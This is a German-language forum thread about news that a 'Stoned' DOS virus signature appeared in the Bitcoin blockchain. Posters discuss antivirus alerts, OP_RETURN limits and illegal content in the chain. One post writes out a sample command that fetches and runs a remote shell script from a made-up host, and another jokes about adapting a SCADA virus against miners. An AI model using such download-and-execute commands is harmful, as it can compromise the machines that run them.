stoned-uralter-dos-virus-in-der-bitcoin-blockchain

[Ov3R]

Mir ist aufgefallen das Bitcoinwisedom laggt, kurz darauf les ich folgende news ..
http://www.golem.de/news/stoned-uralter-dos-virus-in-der-bitcoin-blockchain-1405-106544.html
Bin kein Crack was das angeht aber laut Kommentaren dort (ich gehe von aus das sind auch keine btc profis) wäre es möglich inhalte in der Blockchain unterzubringen die in Deutschland oder anderen ländern innhaltlich verboten wären was wiederum ein bann zu folge hätte.
Ist sowas tatsächlich möglich ? oder nur wieder irgendeine Fud 

Man kann halt mit den Transfer-Kommentaren informationen legaler / Illegaler Natur mit dem Transfer in den Blockchain dauerhaft legen .

Ich denke , dass dieses Ablegen der Virus signatur ein Angriff auf die BTC Stabilität sein sollte , denn ein mit Virenscanner bestückter Rechner wird die BlockChain löschen / Sperren und in einer unendlichen Blockchain ladeschleife als BTC Wallet unbrauchbar werden.
Ohne Virenscanner ist er dann auch angreifbar . 

Finden wir demnächst sämtliche Virensignaturen in der Blockchain wieder? Keine schöne Vorstellung

intressant ist , warum die Miner nicht es schon beim berechnen festgestellt haben. Scheinen wohl Virenscanner frei zu laufen .  Gut zu wissen , man sollte den SCADA Virus mal anpassen , so dass er Miner angreift und allen meinen Kontostand mitteilt ( Wie war noch mal die maximale übrige BTC Menge )

Vermutlich einfach deshalb, weil ein großteil der Miner Headless-Linux Maschinen sind.

Auch linux ist angreifbar

http://www.linux-community.de/Internal/Nachrichten/Zum-Linux-Virus-in-fuenf-Schritten

hoffendlich bekommt niemand einen Bug raus , wie man beim Minen den Miner-PC überredet , einen Code aus dem Blockchain auszuführen .


Ps: wenn wir das thema vertiefen wollen, sollten wir ein unterthema aufmachen , hat nur wenig mit dem Kurs zu tun !!

[1714130460]

1714130460

[1714130460]

1714130460

[1714130460]

1714130460

[1714130460]

1714130460

[jumpman72]

Auch linux ist angreifbar

http://www.linux-community.de/Internal/Nachrichten/Zum-Linux-Virus-in-fuenf-Schritten

hoffendlich bekommt niemand einen Bug raus , wie man beim Minen den Miner-PC überredet , einen Code aus dem Blockchain auszuführen .


Ps: wenn wir das thema vertiefen wollen, sollten wir ein unterthema aufmachen , hat nur wenig mit dem Kurs zu tun !!

Wenn das BTC-Protokoll gut programmiert ist sollte es keine Probleme geben. Denn die Groesse der Nachrichten in der Blockchain sind begrenzt. D.h. du kannst dort nicht beliebig grosse Viren/Trojaner unterbringen.

Eine Loesung waere, dass keine binaeren Daten in der Blockchain abgelegt werden duerfen. So eine Aenderung sollte relativ einfach am Protokoll vorgenommen werden koennen. D.h. ausfuehrbarer Code und Bilder/Videos/mp3s/zips waeren dann schon mal keine Gefahr mehr. Klar kann man die auch in Hex-Darstellung unterbringen, dann schwillt der "Code" aber unverhaeltnismaessig an und die Menge der unterbringbaren Daten verringert sicht weiter.

.........um zum Beispiel mit Hilfe von "bash -c" eine Python-Software von einem entfernten Server zu laden und sie auszuführen.

quelle: http://www.linux-community.de/Internal/Nachrichten/Zum-Linux-Virus-in-fuenf-Schritten

ob das wirklich nicht in den Blockchain passt Momentan hängt es nur an der automatischen Ausführung durch den Miner

[dewdeded]

OP_RETURN ist nur 40 Bytes.

[jumpman72]

OP_RETURN ist nur 40 Bytes.

"bash -c ftp:\\linuxvirus.ru\bitcoin.sh"  38 Bytes

wird zwar immer noch nicht ausgeführt , aber befehl ist kurz genug

[curiosity81]

OP_RETURN ist nur 40 Bytes.

"bash -c ftp:\\linuxvirus.ru\bitcoin.sh"  38 Bytes

wird zwar immer noch nicht ausgeführt , aber befehl ist kurz genug

.

Sowas laeuft aber imho nicht unter der Definition Virus und ist deshalb nicht verbotswuerdig.

Wobei, wenn man bedenkt, dass sogar die Verlinkung von rechtlich geschuetzten Daten rechtlich fragwuerdig sein kann, dann kann das noch zu Problemen fuehren:

http://www.e-recht24.de/artikel/haftunginhalte/22.html

[segeln]

https://bitcointalk.org/index.php?topic=613328.0
es ist nur eine Virussignatur , kein ganzes virus

[OhShei8e]

https://bitcointalk.org/index.php?topic=613328.0
es ist nur eine Virussignatur , kein ganzes virus

Reicht aber, damit die Virenscanner ausschlagen, siehe:

http://www.heise.de/newsticker/meldung/Virenscanner-warnt-vor-Bitcoin-Blockchain-2192407.html

[Ricke]

Das Problem "Virensignatur in Blockchain" ist schon länger bekannt:
http://www.reddit.com/r/Bitcoin/comments/22a1te/alert_windows_defender_detects_dakuma1935_virus/

Ich betreibe den Original-Client schon länger und hatte schon vor über 1 Monat Probleme mit Virenwächtern gehabt, die meine Blockchain als verseucht erkannten und in Quarantäne verschieben wollten. Gottseidank war ich aufmerksam genug und hab die betroffenen Dateien wiederhergestellt anstatt sie zu löschen.

Gegenmaßnahme:
Schritt 1: Antiviren-Programm öffnen
Schritt 2: Bitcoin-Blockchain-Verzeichnis in die Ausnahmeliste hinzufügen
Fertig.

Seitdem habe ich Ruhe.

[WiiD]

Gegenmaßnahme:
Schritt 1: Antiviren-Programm öffnen
Schritt 2: Bitcoin-Blockchain-Verzeichnis in die Ausnahmeliste hinzufügen
Fertig.

Hör doch auf diese Negativ-Meldung zu negieren, wie du weißt, doppelte Verneinung ist starke Bejahung. Und das wollen die Leute die noch einen Haufen Bitcoins für ~450$ pro Stück kaufen wollen ganz sicher nicht, die können garnicht genug Negativ-Meldungen haben.

[mezzomix]

https://bitcointalk.org/index.php?topic=613328.0
es ist nur eine Virussignatur , kein ganzes virus

Reicht aber, damit die Virenscanner ausschlagen, siehe:

http://www.heise.de/newsticker/meldung/Virenscanner-warnt-vor-Bitcoin-Blockchain-2192407.html

Allerdings sehe ich das Problem in diesem Fall eher beim "Virenscanner" (der in diesem Fall genau so wenig auf Viren scannt, wie der Zitronenfalter Zitronen faltet).

[dewdeded]

Signaturen von Viren zu suchen ist echtes und "richtiges" Virenscanning.

[segeln]

 (der in diesem Fall genau so wenig auf Viren scannt, wie der Zitronenfalter Zitronen faltet).

der war gut +1

[hartvercoint]

Allerdings sehe ich das Problem in diesem Fall eher beim "Virenscanner" (der in diesem Fall genau so wenig auf Viren scannt, wie der Zitronenfalter Zitronen faltet).

Schickst du denn den grünen Pelz auf deinem Brot auch erst ins Labor, bevor du sagen würdest, dass es Schimmel ist?  

"grün und pelzig" oder "weiß und pelzig" reicht da als Schimmelsignatur einfach aus!

Pelziges Brot ist generell verdächtig!

Genauso ist es mit grünem Pelz auf der Blockchain! 

[Freyr]

Hat eigentlich jemand mal eine detailliertere Quelle dazu oder es selbst erlebt? Mich würde interessieren, in welcher Datei der Virus sein soll. Vor paar Monaten gab es ja einen ähnlichen Fall, aber da soll der Virus in den sst-Dateien gewesen sein. Das sind Indexdateien (Sorted String Table), die von der Datenbankschicht erzeugt werden, also nicht aus der Blockchain stammen. Die Virussignatur ist da also rein zufällig entstanden.

Quelle: https://bitcointalk.org/index.php?topic=557370.0

[OhShei8e]

Hat eigentlich jemand mal eine detailliertere Quelle dazu oder es selbst erlebt? Mich würde interessieren, in welcher Datei der Virus sein soll. Vor paar Monaten gab es ja einen ähnlichen Fall, aber da soll der Virus in den sst-Dateien gewesen sein. Das sind Indexdateien (Sorted String Table), die von der Datenbankschicht erzeugt werden, also nicht aus der Blockchain stammen. Die Virussignatur ist da also rein zufällig entstanden.

Quelle: https://bitcointalk.org/index.php?topic=557370.0

Valider Punkt. Der Block wird in keinem Artikel, den ich gelesen habe, genannt. Selbst wenn es stimmt, so richtig überprüft scheint das keiner zu haben. Ausgangspunkt scheint diese Diskussion gewesen zu sein:

https://answers.microsoft.com/en-us/protect/forum/mse-protect_updating/microsoft-security-essentials-reporting-false/0240ed8e-5a27-4843-a939-0279c8110e1c

Da wird aber nichts Konkretes genannt, außer, dass der AV-Scanner aufheult.

Am Ende schreiben wohl nur alle voneinander ab. Fazit: Was man nicht selbst gesehen hat, nicht glauben.

[dewdeded]

Durchsucht ("grep"'t) doch einfach mal das/die Blockchain(-Verzeichnis) nach dem String "toned". Dann solltet ihr den Virus in der Chain finden. Ich bin mir sicher, dass die Virenscanner keine gehashte Signatur (des "Schadcodes") detecten sondern eben einfach den String den der Virus bei Start des Computers meldet.
Da dieser "Your [PC|Computer] has been [s|S]toned[.|!]" lauten kann, würde ich eben nach "toned" suchen.

[mezzomix]

Schickst du denn den grünen Pelz auf deinem Brot auch erst ins Labor, bevor du sagen würdest, dass es Schimmel ist?  

"grün und pelzig" oder "weiß und pelzig" reicht da als Schimmelsignatur einfach aus!

Pelziges Brot ist generell verdächtig!

Genauso ist es mit grünem Pelz auf der Blockchain!  

Ein DOS(!) Virus im (nicht ausführbaren) Block Storage ist eben nicht verdächtig. Wobei der Scanner ja nicht mal ein Virus gefunden hat, sondern lediglich ein paar Byte die er für einen Teil des Virus gehalten hat. Wenn man die "Virensignatur" nur kurz genug macht, kann man in der Datenmenge der Blockchain vermutlich eine ganze Menge "böse Viren" finden.

Ich lösche auch nicht alle meine Datenträger, wenn der Rechner mal ein unerwartetes Verhalten zeigt. Vorsicht ist angebracht, unkontrollierter panischer Aktionismus nicht.

[hartvercoint]

Ein DOS(!) Virus im (nicht ausführbaren) Block Storage ist eben nicht verdächtig. Wobei der Scanner ja nicht mal ein Virus gefunden hat, sondern lediglich ein paar Byte die er für einen Teil des Virus gehalten hat. Wenn man die "Virensignatur" nur kurz genug macht, kann man in der Datenmenge der Blockchain vermutlich eine ganze Menge "böse Viren" finden.

Ich lösche auch nicht alle meine Datenträger, wenn der Rechner mal ein unerwartetes Verhalten zeigt. Vorsicht ist angebracht, unkontrollierter panischer Aktionismus nicht.

Das ist falsch. Die Tatsache, dass ich nicht einfach nen Doppelklick auf eine Datei machen kann, um sie auszuführen, heißt noch lange nicht, dass ihr Inhalt nicht ausführbar ist! Nur weil Code in der vorliegenden Form nicht auf triviale Weise ausgeführt werden kann, heißt das lange nicht, dass es unkritisch ist, dass er dort ist. Dass man ungehindert beliebige Binärdaten auf Bitcoin-Nodes hochladen kann, ist durchaus für ein Problem. Erst recht, wenn es dazu führt, dass viele Leute die entsprechenden Dateien im Virenscanner als Ausnahme hinzufügen müssen!

Es wird immer nur nach Signaturen gesucht, anders ist es nicht praktikabel. Nach kompletten Viren zu suchen, würde auch bedeuten, dass ich mir mit dem Virenscanner zusammen eine riesige Datenbank an ausführbarer Schadsoftware herunterlade. Na vielen Dank!

[mezzomix]

Dass man ungehindert beliebige Binärdaten auf Bitcoin-Nodes hochladen kann, ist durchaus für ein Problem.

Das ist tatsächlich unschön,

Erst recht, wenn es dazu führt, dass viele Leute die entsprechenden Dateien im Virenscanner als Ausnahme hinzufügen müssen!

aber hier ist eindeutig der "Virenscanner" schuld. Wenn er zu doof ist, tatsächliche Viren zu finden, und nur Fragmente entdeckt, sollte er wenigstens eine ordentliche Reaktion zeigen und nicht behaupten er habe einen Schädling gefunden oder sogar die Dateien entfernen/verschieben. Ja, IT Sicherheit ist unbequem.

Es wird immer nur nach Signaturen gesucht, anders ist es nicht praktikabel. Nach kompletten Viren zu suchen, würde auch bedeuten, dass ich mir mit dem Virenscanner zusammen eine riesige Datenbank an ausführbarer Schadsoftware herunterlade. Na vielen Dank!

Ein Schadcode ist nicht unabhängig von der Präsentation ausführbar. Zu einer Schadsoftware gehört mehr als ein paar Binärdaten in einer Datenbank (wir sind hier ja nicht bei Vernor Vinge im Roman ).

Ausserdem ist "nicht praktikabel" kein Argument dafür, grobe Fehler in der "Sicherheitssoftware" kritiklos hinzunehmen. Es gibt sehr wohl einfache Möglichkeiten, zu bewerten ob ein Schädlingsfragment tatsächlich Probleme macht. Auch eine abgestufte Reaktion ist kein Hexenwerk.

[btcash]

Gibt zu dem Thema ziemlich wenig Inforamtionen. Eigentlich nur den Microsoft Support Thread. Nicht mal eine richtige Diskussion im Main bereich. Aber ist egal, ob wahr oder falsch. Die Problematik mit illegalem Inhalt in der Blockchain bleibt.

Ich "warte" ja noch auf den ersten KiPo Link in der Blockchain. Gibt es einen Plan um damit umzugehen? User von SPV Clienten wird das Problem nicht betreffen, aber Betreiber von Nodes schon.

EDIT:
Scheinbar gibt es Ideen, aber werden wohl nicht sehr aktiv verfolgt. Wie Gavin immer so schön sagt, wir kümmern uns darum, wenn es ein Problem wird.
http://sourceforge.net/p/bitcoin/mailman/message/30705609/